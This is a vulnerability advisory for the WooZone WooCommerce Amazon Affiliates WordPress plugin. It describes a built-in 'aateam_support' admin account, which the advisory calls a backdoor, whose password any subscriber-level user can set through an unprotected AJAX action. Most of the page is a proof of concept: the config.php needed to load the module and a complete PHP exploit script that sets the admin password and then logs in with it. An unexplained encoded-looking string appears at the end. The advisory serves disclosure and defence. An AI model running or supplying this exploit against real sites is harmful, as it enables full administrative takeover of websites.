WooZone - WooCommerce Amazon Affiliates [Authenticated Unrestricted Create/Update Admin User Password]

This vulnerability is related to DWF-2017-87001, check WooZone - WooCommerce Amazon Affiliates [Arbitrary File Upload] for details.

Description

Exploiting the lack of capabilities in the AJAX action mentioned in the aforementioned report allows a user to create/update password for an admin user created from this plugin in order to provide developers a convenient way to provide support.

This plugin creates a user with administrative privileges and the username aateam_support and emails credentials to [email protected]. This can safely be considered a backdoor. In any case an attacker is able to update this user’s password to an arbitrary value and then use this password to login to the vulnerable website.

PoC

The source files were provided by Brad from a hacked website. It seems like remote_support module is missing config.php file. Without it the module won’t load and this attack will fail. The contents of config.php file should look like this:

<?php
echo json_encode(
	array(
		'remote_support' => array(
			'version' => '1.0',
			'menu' => array(
				'order' => 20,
				'show_in_menu' => true,
				'title' => 'Remote support',
				'icon' => 'images/16.png'
			),
			/*'in_dashboard' => array(
				'icon' 	=> 'images/32.png',
				'url'	=> admin_url("admin.php?page=WooZone_remote_support")
			),*/
			'help' => array(
				'type' => 'remote',
				'url' => 'http://docs.aa-team.com/woocommerce-amazon-affiliates/documentation/price_select/'
			),
			'description' => "....",
			'module_init' => 'init.php',
			'load_in' => array(
                'backend' => array(
                    'admin.php?page=WooZone_remote_support',
                    'admin-ajax.php'
                ),
                'frontend' => false
			),
			'javascript' => array(
				'admin',
				'hashchange',
				'tipsy',
				'thickbox'
			),
			'css' => array(
				'admin',
				'tipsy'
			)
		)
	)
);

Actual exploit:

#!/usr/bin/env php
<?php
/*******************************************************************************
 * WooZone - WooCommerce Amazon Affiliates [Authenticated Unrestricted Create/Update Admin User Password]
 *
 * Exploit Author: Pan Vag <[email protected]>
 * To install deps run `composer install`
 ******************************************************************************/

require_once 'vendor/autoload.php';

use Wordfence\ExKit\Cli;
use Wordfence\ExKit\Config;
use Wordfence\ExKit\Endpoint;
use Wordfence\ExKit\ExitCodes;
use Wordfence\ExKit\Session;
use Wordfence\ExKit\WPAuthentication;

Config::get('url.base', null, true, 'Enter the site URL')
|| ExitCodes::exitWithFailedPrecondition('You must enter a valid URL');

$s = new Session();
$s->XDebugOn();

Cli::writeInfo('Authenticating...');
WPAuthentication::logInAsUserRole($s, WPAuthentication::USER_ROLE_SUBSCRIBER);

$username = 'aateam_support';
$pass = uniqid();

Cli::writeInfo('Attempting to create a user with admin access or update the password of the current user to '.$pass.'...');

$postData = [
	'action' => 'WooZoneRemoteSupportRequest',
	'sub_actions' => 'access_details',
	'params' => http_build_query([
		'WooZone-create_wp_credential' => 'yes',
		'WooZone-password' => $pass,
	]),
];

$r = $s->post(Endpoint::adminAjaxURL(), [], $postData);

$rJson = @json_decode($r->body);

if(!$r->success || !$rJson || !isset($rJson->status) || $rJson->status != 'valid'){
	ExitCodes::exitWithFailed('Failed to exploit');
}

Cli::writeInfo('Validating exploitation...');

$s = new Session();

WPAuthentication::logInAsUser($s, $username, $pass);

Cli::writeSuccess('Exploitation suceessful');
WordPress Plugins Authenticated Unrestricted Create/Update Admin User Password
INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX